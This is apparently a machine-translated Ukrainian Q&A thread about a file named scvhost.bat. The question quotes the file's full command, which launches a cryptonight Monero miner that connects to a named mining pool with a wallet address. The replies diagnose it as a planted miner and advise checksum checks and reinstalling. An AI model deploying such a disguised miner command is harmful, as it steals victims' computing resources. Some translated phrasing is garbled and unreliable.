Це scvhost.bat з cryptonight вірусом або шахтарем?


17

Я щойно знайшов цей .bat файл, який отримав назву scvhost.bat. У цьому файлі містився цей вміст:

scvhost -a cryptonight -o stratum+tcp://xmr-eu.dwarfpool.com:8005 -u 48uh2mrdkdq2tQysfkX2hZDi2hkRua4GX13EqY8djJ5xNXhez7baztVWbwXa34vUMveKAzAiA4j8xgUi29TpKXpm42jqV6H.microSf -p MXXXXXX-t 02

Це вірус (для крадіжки інформації тощо) чи посаджений шахтар? Я хвилююся, оскільки я також балакаю в криптовалютах і stratumце валюта, про яку йдеться у вищезгаданому файлі.


1
Це справді здається шахтарем. З огляду на те, що ви самі використовуєте криптовалюти, якщо ви також шахтуєте, переконайтеся, що це насправді не є частиною того, що ви використовуєте для видобутку. Ви можете зробити це, перейменувавши розширення .bat на щось інше і побачивши, чи зможете ви зазвичай перезавантажити після перезавантаження. Одне, що мені здається дивним у цьому файлі, - це те, що він зазвичай називав би себе, враховуючи, що scvhost - це і ім'я того, що він виконує, і файл bat. Зазвичай це призведе до циклу.
LPChip

2
@VirtualAnomaly Я думаю, що ви помиляєтеся sVChost з sCVhost, згаданим тут. Так, я дуже знаю, що svchost - це механіка для розміщення хостингових послуг.
LPChip

2
@LPChip Мої вибачення, ви прав, я помилився.
Віртуальна аномалія

2
Хтось грав занадто багато Starcraft, я думаю.
CodesInChaos

1
@lucidbrot SCV - це "будівельник" підрозділу однієї з ігор гри (ландшафтів) гри; в такому випадку він означає "космічний будівельний транспортний засіб".
Аарон

Відповіді:


34

Це, здається, є шахтарем певного роду, тим більше, що параметр містить URL до пулу видобутку. Однак вам потрібно бути впевненим, що є у двійковій. Було б сенс порівнювати контрольні суми бінарних даних, які ви знайшли у вашій системі, з випусками, зробленими командою розробників шахтаря. Якщо вони відрізняються; вважаємо вас системою незахищеною.

Інша проблема полягає в тому, що ви дізналися про цього майнера (можливо, тому, що він використовував багато процесора), але ви не знаєте, що ще трапилось у вашій системі. Якби зловмисник міг запустити шахтаря, він міг би запустити й інші речі. Можливо, буде гарною ідеєю відновитись із резервної копії або все-таки зробити нову інсталяцію.

Використовуючи наш веб-сайт, ви визнаєте, що прочитали та зрозуміли наші Політику щодо файлів cookie та Політику конфіденційності.
Licensed under cc by-sa 3.0 with attribution required.